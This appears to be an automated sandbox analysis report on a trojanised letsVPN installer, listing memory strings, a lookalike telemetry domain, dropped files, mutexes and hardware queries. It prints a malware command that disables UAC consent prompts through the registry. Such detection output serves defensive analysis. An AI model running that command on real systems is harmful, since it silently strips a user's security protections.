              Source: letsvpn-latest.exe, 00000015.00000003.2558570579.0000000003107000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2557572351.0000000003103000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2551617958.0000000003102000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2550819271.000000000310C000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2559553635.0000000003104000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/8260054-killer-%E7%BD%91%E5%8D%A1%E6%9C%8D%E5%8A%A1%
              Source: letsvpn-latest.exe, 00000015.00000003.2558570579.0000000003107000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2557572351.0000000003103000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2551617958.0000000003102000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2550819271.000000000310C000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2559553635.0000000003104000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/8260070-intel-connectivity-service-%E9%9C%80%E8%A6%8
              Source: letsvpn-latest.exe, 00000015.00000003.2558570579.0000000003107000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2557572351.0000000003103000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2551617958.0000000003102000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2550819271.000000000310C000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2559553635.0000000003104000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/8260083-host-network-service-%E9%9C%80%E8%A6%81%E7%8
              Source: letsvpn-latest.exe, 00000015.00000003.2360789274.0000000003103000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 0000003B.00000000.2693507418.0000000000712000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/8262690-special-settings-for-intel-connectivity-serv
              Source: letsvpn-latest.exe, 00000015.00000003.2360789274.0000000003103000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 0000003B.00000000.2693507418.0000000000712000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/8262720-special-settings-for-host-network-service
              Source: letsvpn-latest.exe, 00000015.00000003.2360789274.0000000003103000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 0000003B.00000000.2693507418.0000000000712000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/8262786-special-settings-for-expressconnect
              Source: letsvpn-latest.exe, 00000015.00000003.2360789274.0000000003103000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 0000003B.00000000.2693507418.0000000000712000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/8262801-special-settings-for-killer-network-service
              Source: letsvpn-latest.exe, 00000015.00000003.2540388377.000000000310F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/8262818-%D1%81%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D
              Source: letsvpn-latest.exe, 00000015.00000003.2540388377.000000000310F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/8262867-%D1%81%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D
              Source: letsvpn-latest.exe, 00000015.00000003.2540388377.000000000310F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/8262897-%D1%81%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D
              Source: letsvpn-latest.exe, 00000015.00000003.2540388377.000000000310F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/8262909-%D1%81%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D
              Source: letsvpn-latest.exe, 00000015.00000003.2558570579.0000000003107000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2557572351.0000000003103000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2551617958.0000000003102000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2550819271.000000000310C000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2559553635.0000000003104000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/8263010-windows-%E5%A6%82%E4%BD%95%E6%B8%85%E7%90%86
              Source: letsvpn-latest.exe, 00000015.00000003.2360789274.0000000003103000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 0000003B.00000000.2693507418.0000000000712000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/8263068-how-to-delete-hosts-in-windows
              Source: letsvpn-latest.exe, 00000015.00000003.2540388377.000000000310F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/8263093-%D0%BA%D0%B0%D0%BA-%D1%83%D0%B4%D0%B0%D0%BB%
              Source: letsvpn-latest.exe, 00000015.00000003.2558570579.0000000003107000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2557572351.0000000003103000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2551617958.0000000003102000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2550819271.000000000310C000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2360789274.0000000003103000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2559553635.0000000003104000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 0000003B.00000000.2693507418.0000000000712000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/collections/1611781-%E4%B8%AD%E6%96%87%E5%B8%AE%E5%8A%A9
              Source: letsvpn-latest.exe, 00000015.00000003.2540388377.000000000310F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/collections/1627706-%D0%BF%D0%BE%D0%BC%D0%BE%D1%89%D1%8C-%D1%
              Source: letsvpn-latest.exe, 00000015.00000003.2360789274.0000000003103000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 0000003B.00000000.2693507418.0000000000712000.00000002.00000001.01000000.00000019.sdmp, LetsPRO.exe, 0000003D.00000002.3395428987.00000000024D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/collections/1628560-help-documents
              Source: letsvpn-latest.exe, 00000015.00000003.2360789274.0000000003103000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 0000003B.00000000.2693507418.0000000000712000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/collections/Killer
              Source: letsvpn-latest.exe, 00000015.00000003.2558570579.0000000003107000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2557572351.0000000003103000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2551617958.0000000003102000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2550819271.000000000310C000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2540388377.000000000310F000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2360789274.0000000003103000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2559553635.0000000003104000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 0000003B.00000000.2693507418.0000000000712000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: https://letsvpn.world/privacy.html
              Source: letsvpn-latest.exe, 00000015.00000003.2558570579.0000000003107000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2557572351.0000000003103000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2551617958.0000000003102000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2550819271.000000000310C000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2540388377.000000000310F000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2360789274.0000000003103000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2559553635.0000000003104000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 0000003B.00000000.2693507418.0000000000712000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: https://letsvpn.world/registerterm.html
              Source: letsvpn-latest.exe, 00000015.00000003.2558570579.0000000003107000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2557572351.0000000003103000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2551617958.0000000003102000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2550819271.000000000310C000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2540388377.000000000310F000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2360789274.0000000003103000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2559553635.0000000003104000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 0000003B.00000000.2693507418.0000000000712000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: https://letsvpn.world/terms.html
              Source: LetsPRO.exe, 0000003D.00000002.3424803867.000000000EEAE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://nit.crash1ytics.com
              Source: LetsPRO.exe, 0000003D.00000002.3426454814.000000000EF6A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://nit.crash1ytics.com/app36/device
              Source: LetsPRO.exe, 0000003D.00000002.3426454814.000000000EF6A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://nit.crash1ytics.com/app36/devicechecking
              Source: LetsPRO.exe, 0000003D.00000002.3426454814.000000000EF6A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://nit.crash1ytics.com/app36/devicehttps://nit.crash1ytics.com/app36/device
              Source: LetsPRO.exe, 0000003D.00000002.3426454814.000000000EF6A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://nit.crash1ytics.com/app36/devicehttps://nit.crash1ytics.com/app36/deviceH
              Source: LetsPRO.exe, 0000003D.00000002.3421442999.000000000ED0E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://nit.crash1ytics.com/app36/devicehttps://nit.crash1ytics.com/app36/deviceHO
              Source: LetsPRO.exe, 0000003D.00000002.3421442999.000000000ED0E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://nit.crash1ytics.com/app36/devicehttps://nit.crash1ytics.com/app36/deviceHY
              Source: LetsPRO.exe, 0000003D.00000002.3424803867.000000000EEAE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://nit.crash1ytics.comhttpCode=-2
              Source: LetsPRO.exe, 0000003D.00000002.3424803867.000000000EEAE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://nit.crash1ytics.comx
              Source: powershell.exe, 0000001B.00000002.2594140593.0000000005789000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: letsvpn-latest.exe, 00000015.00000003.2360789274.0000000003103000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 0000003B.00000000.2693507418.0000000000712000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: https://pngimg.com/uploads/light/light_PNG14440.png
              Source: letsvpn-latest.exe, 00000015.00000003.2360789274.0000000003103000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 0000003B.00000000.2693507418.0000000000712000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: https://widget.intercom.io/widget/
              Source: letsvpn-latest.exe, 00000015.00000003.2343440386.000000000310D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
              Source: letsVPN.exe, 00000000.00000003.2184550370.0000000004201000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2374293880.0000000003107000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2463704916.000000000310F000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2376938176.000000000310A000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2382422966.000000000310C000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2478011371.000000000310A000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2432280356.0000000003101000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2369093669.000000000310B000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2558570579.0000000003107000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2458361290.0000000003100000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2406641167.0000000003106000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2541164206.000000000310C000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2530969091.000000000310E000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2490411396.0000000003102000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2486208547.000000000310D000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2449881395.0000000003109000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2509600299.0000000003102000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2557572351.0000000003103000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 
00000015.00000003.2520982126.00000000031F6000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2400273396.000000000310F000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2491542161.000000000310A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repository/0
              Source: LetsPRO.exe, 0000003B.00000002.2711648046.0000000005742000.00000002.00000001.01000000.0000001E.sdmpString found in binary or memory: https://www.newtonsoft.com/jsonschema
              Source: letsvpn-latest.exe, 00000015.00000003.2380231891.0000000003105000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 0000003B.00000002.2711648046.0000000005742000.00000002.00000001.01000000.0000001E.sdmpString found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
              Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49945
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49900
              Source: C:\ProgramData\letsvpn-latest.exe Code function: 21_2_00405705 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard
              Source: C:\Windows\System32\mmc.exe Window created: window name: CLIPBRDWNDCLASS
              Source: Yara match File source: 61.2.LetsPRO.exe.68890000.21.unpack, type: UNPACKEDPE
              Source: Yara match File source: 00000015.00000003.2520982126.00000000031F6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: Process Memory Space: letsvpn-latest.exe PID: 4488, type: MEMORYSTR
              Source: Yara match File source: C:\Program Files (x86)\letsvpn\app-3.12.0\libwin.dll, type: DROPPED
              Source: C:\Windows\System32\drvinst.exe File created: C:\Windows\System32\DriverStore\Temp\{a1287589-5177-bd45-adb1-516ad4522f2f}\SETB60F.tmp
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\driver\tap0901.cat
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe File created: C:\Users\user\AppData\Local\Temp\{7c77b43b-9dea-844d-b268-70c5b13694a4}\SETB4D7.tmp
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe File created: C:\Users\user\AppData\Local\Temp\{7c77b43b-9dea-844d-b268-70c5b13694a4}\tap0901.cat (copy)
              Source: C:\Windows\System32\drvinst.exe File created: C:\Windows\System32\DriverStore\Temp\{a1287589-5177-bd45-adb1-516ad4522f2f}\tap0901.cat (copy)
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exe Code function: 19_2_00521660: CreateFileW,DeviceIoControl,CloseHandle
              Source: C:\ProgramData\letsvpn-latest.exe Code function: 21_2_0040351C EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,ExitProcess,CoUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\driver\tap0901.sys
              Source: C:\Windows\System32\drvinst.exe File created: C:\Windows\System32\DriverStore\Temp\{a1287589-5177-bd45-adb1-516ad4522f2f}
              Source: C:\Windows\System32\svchost.exe File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
              Source: C:\Windows\System32\drvinst.exe File created: C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_662fd96dfdced4ae
              Source: C:\Windows\System32\drvinst.exe File created: C:\Windows\System32\DriverStore\drvstore.tmp
              Source: C:\Windows\System32\drvinst.exe File created: C:\Windows\inf\oem4.inf
              Source: C:\Windows\System32\drvinst.exe File created: C:\Windows\System32\drivers\SETBDCE.tmp
              Source: C:\Windows\System32\drvinst.exe File deleted: C:\Windows\System32\DriverStore\Temp\{a1287589-5177-bd45-adb1-516ad4522f2f}\SETB5FE.tmp
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe Process token adjusted: Load Driver
              Source: C:\Windows\System32\svchost.exe Process token adjusted: Security
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exe Code function: String function: 00688C30 appears 40 times
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exe Code function: String function: 6D08EDFC appears 50 times
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exe Code function: String function: 6D0949A4 appears 54 times
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exe Code function: String function: 6D08ED7E appears 109 times
              Source: s.0.dr Static PE information: No import functions for PE file found
              Source: s.0.dr Static PE information: Data appended to the last section found
              Source: letsVPN.exe, 00000000.00000003.2226012846.000000000067F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCmd.Exej% vs letsVPN.exe
              Source: letsVPN.exe, 00000000.00000002.2235327158.000000000067F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCmd.Exej% vs letsVPN.exe
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t reg_dword /d 0 /F
              Source: System.IO.FileSystem.AccessControl.dll.21.dr, FileSystemAclExtensions.cs Security API names: directoryInfo.GetAccessControl
              Source: System.IO.FileSystem.AccessControl.dll.21.dr, FileSystemAclExtensions.cs Security API names: fileInfo.SetAccessControl
              Source: System.IO.FileSystem.AccessControl.dll.21.dr, FileSystemAclExtensions.cs Security API names: fileStream.GetAccessControl
              Source: System.IO.FileSystem.AccessControl.dll.21.dr, FileSystemAclExtensions.cs Security API names: fileInfo.GetAccessControl
              Source: System.IO.FileSystem.AccessControl.dll.21.dr, FileSystemAclExtensions.cs Security API names: directoryInfo.SetAccessControl
              Source: System.IO.FileSystem.AccessControl.dll.21.dr, FileSystemAclExtensions.cs Security API names: fileStream.SetAccessControl
              Source: System.IO.Pipes.AccessControl.dll.21.dr, PipesAclExtensions.cs Security API names: System.IO.Pipes.PipeStream.SetAccessControl(System.IO.Pipes.PipeSecurity)
              Source: System.IO.Pipes.AccessControl.dll.21.dr, PipesAclExtensions.cs Security API names: System.IO.Pipes.PipeStream.GetAccessControl()
              Source: letsvpn-latest.exe, 00000015.00000003.2352114533.000000000310F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ".xshd;.wxs;.wxi;.wxl;.proj;.csproj;.vbproj;.ilproj;" +
              Source: letsvpn-latest.exe, 00000015.00000003.2352114533.000000000310F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: <SyntaxDefinition name="XML" extensions=".xml;.xsl;.xslt;.xsd;.manifest;.config;.addin;.xshd;.wxs;.wxi;.wxl;.proj;.csproj;.vbproj;.ilproj;.booproj;.build;.xfrm;.targets;.xaml;.xpt;.xft;.map;.wsdl;.disco;.ps1xml;.nuspec" xmlns="http://icsharpcode.net/sharpdevelop/syntaxdefinition/2008">
              Source: letsvpn-latest.exe, 00000015.00000003.2352114533.000000000310F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: c.xml;.xsl;.xslt;.xsd;.manifest;.config;.addin;.xshd;.wxs;.wxi;.wxl;.proj;.csproj;.vbproj;.ilproj;.booproj;.build;.xfrm;.targets;.xaml;.xpt;.xft;.map;.wsdl;.disco;.ps1xml;.nuspec
              Source: classification engine Classification label: mal60.spre.troj.spyw.evad.winEXE@103/291@9/12
              Source: C:\Users\user\Desktop\letsVPN.exe Code function: 0_2_0000000180003848 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,_beginthreadex,Sleep,SleepEx,CloseHandle
              Source: C:\Users\user\Desktop\letsVPN.exe Code function: 0_2_000000018002A010 AdjustTokenPrivileges
              Source: C:\ProgramData\letsvpn-latest.exe Code function: 21_2_0040351C EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,ExitProcess,CoUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe Code function: 33_2_00007FF796191C7C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,InitiateSystemShutdownExW
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exe Code function: 19_2_6D0FE060 _wfindnext32i64,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,_invoke_watson,_getdiskfree,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,memset,GetDiskFreeSpaceA,GetLastError,_errno
              Source: C:\Users\user\Desktop\letsVPN.exe Code function: 0_2_000000018000310C CoInitialize,CoImpersonateClient,CoInitializeSecurity,CLSIDFromProgID,CoCreateInstance,VariantInit,VariantInit,VariantInit,SysAllocString,SysAllocString,SysAllocString,SysAllocString,VariantClear,CoUninitialize
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe Code function: 33_2_00007FF796192C44 lstrcpyW,LoadLibraryW,FindResourceW,FindResourceExW,LoadResource,LockResource,lstrlenW,lstrcpyW,FreeLibrary,CreateEventW,CreateThread,SetEvent,WaitForSingleObject,CloseHandle,CloseHandle
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn
              Source: C:\Users\user\Desktop\letsVPN.exe File created: C:\Users\user\AppData\Roaming\06VAP.bat
              Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1780:120:WilError_03
              Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2996:120:WilError_03
              Source: C:\Windows\System32\drvinst.exe Mutant created: \BaseNamedObjects\DrvInst.exe_mutex_{5B10AC83-4F13-4fde-8C0B-B85681BA8D73}
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe Mutant created: NULL
              Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7184:120:WilError_03
              Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5272:120:WilError_03
              Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3300:120:WilError_03
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exe Mutant created: \Sessions\1\BaseNamedObjects\V 4 I
              Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6628:120:WilError_03
              Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7472:120:WilError_03
              Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7392:120:WilError_03
              Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8064:120:WilError_03
              Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6600:120:WilError_03
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe Mutant created: \Sessions\1\BaseNamedObjects\C__Program Files (x86)_letsvpn_app-3.12.0_Log_
              Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5160:120:WilError_03
              Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8108:120:WilError_03
              Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6528:120:WilError_03
              Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7864:120:WilError_03
              Source: C:\Users\user\Desktop\letsVPN.exe Mutant created: \Sessions\1\BaseNamedObjects\V? 5
              Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7640:120:WilError_03
              Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8052:120:WilError_03
              Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2632:120:WilError_03
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Users\user\AppData\Local\Temp\nsz19AF.tmp
              Source: C:\Users\user\Desktop\letsVPN.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Roaming\06VAP.bat"
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exe Command line argument: main.cc 19_2_00515F90
              Source: letsVPN.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select ProcessorID From Win32_processor
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select ProcessorId From Win32_Processor
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select Manufacturer From Win32_Processor
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
